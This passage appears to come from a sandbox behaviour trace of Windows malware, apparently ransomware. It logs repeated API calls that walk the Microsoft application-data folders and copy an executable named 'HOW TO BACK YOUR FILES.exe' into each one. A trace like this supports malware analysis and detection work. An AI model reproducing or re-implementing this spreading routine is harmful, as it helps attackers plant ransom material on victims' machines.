nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.621] CloseHandle (hObject=0x120) returned 1 [0104.621] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.621] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.621] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6c40e280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6c40e280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.622] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.622] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.622] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0104.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0104.622] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2560 | out: hHeap=0x2b0000) returned 1 [0104.622] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned 95 [0104.622] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0104.622] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.622] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.623] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.623] GetLastError () returned 0x0 [0104.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.623] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.623] CloseHandle (hObject=0x120) returned 1 [0104.623] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.623] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.623] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6c6959e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6c6959e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.623] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.623] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.624] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup" [0104.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f3148 | out: hHeap=0x2b0000) returned 1 [0104.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0104.624] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup") returned 91 [0104.624] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup" [0104.624] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.624] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.624] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.625] GetLastError () returned 0x0 [0104.625] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.625] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.625] CloseHandle (hObject=0x120) returned 1 [0104.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.625] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4da4b400, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4da4b400, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.625] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.625] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.625] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\old", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\old") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\old" [0104.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0104.625] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0104.625] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\old") returned 95 [0104.625] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\old" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\old") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\old" [0104.625] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.626] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\old\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\windows mail\\backup\\old\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.626] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.626] GetLastError () returned 0x0 [0104.626] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.626] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.627] CloseHandle (hObject=0x120) returned 1 [0104.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.627] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.627] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Windows Mail\\Backup\\old\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ca27ae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ca27ae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.627] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.627] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.627] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Visio", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Visio") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Visio" [0104.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0390 | out: hHeap=0x2b0000) returned 1 [0104.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0104.627] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Visio") returned 77 [0104.627] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Visio" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Visio") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Visio" [0104.627] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.627] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Visio\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\visio\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.628] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.628] GetLastError () returned 0x0 [0104.628] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.628] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.628] CloseHandle (hObject=0x120) returned 1 [0104.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.628] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.628] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Visio\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x962f4540, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x6ca73da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ca73da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.628] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.628] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.629] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\TaskSchedulerConfig", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\TaskSchedulerConfig") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\TaskSchedulerConfig" [0104.629] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f3088 | out: hHeap=0x2b0000) returned 1 [0104.629] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0104.629] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\TaskSchedulerConfig") returned 91 [0104.629] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\TaskSchedulerConfig" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\TaskSchedulerConfig") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\TaskSchedulerConfig" [0104.629] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.629] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\TaskSchedulerConfig\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\taskschedulerconfig\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.629] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.630] GetLastError () returned 0x0 [0104.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.630] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.630] CloseHandle (hObject=0x120) returned 1 [0104.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.630] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.630] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\TaskSchedulerConfig\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3abef650, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4da71560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4da71560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.630] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.630] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.630] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Publisher", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Publisher") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Publisher" [0104.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7860 | out: hHeap=0x2b0000) returned 1 [0104.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0104.630] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Publisher") returned 81 [0104.630] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Publisher" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Publisher") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Publisher" [0104.630] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.631] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Publisher\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\publisher\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.631] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.631] GetLastError () returned 0x0 [0104.631] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.632] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.632] CloseHandle (hObject=0x120) returned 1 [0104.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.632] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.632] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Publisher\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4da71560, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4da71560, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.632] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.632] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.632] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook" [0104.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d02e8 | out: hHeap=0x2b0000) returned 1 [0104.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0104.632] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook") returned 79 [0104.632] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook" [0104.632] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.632] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\outlook\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.633] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.633] GetLastError () returned 0x0 [0104.633] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.633] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.633] CloseHandle (hObject=0x120) returned 1 [0104.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.633] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.633] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3dc40980, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x6ca99f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ca99f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.633] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.634] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.634] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook\\RoamCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook\\RoamCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Outlook\\RoamCache" [0104.634] HeapFree (in: hHeap=0x2b0000, 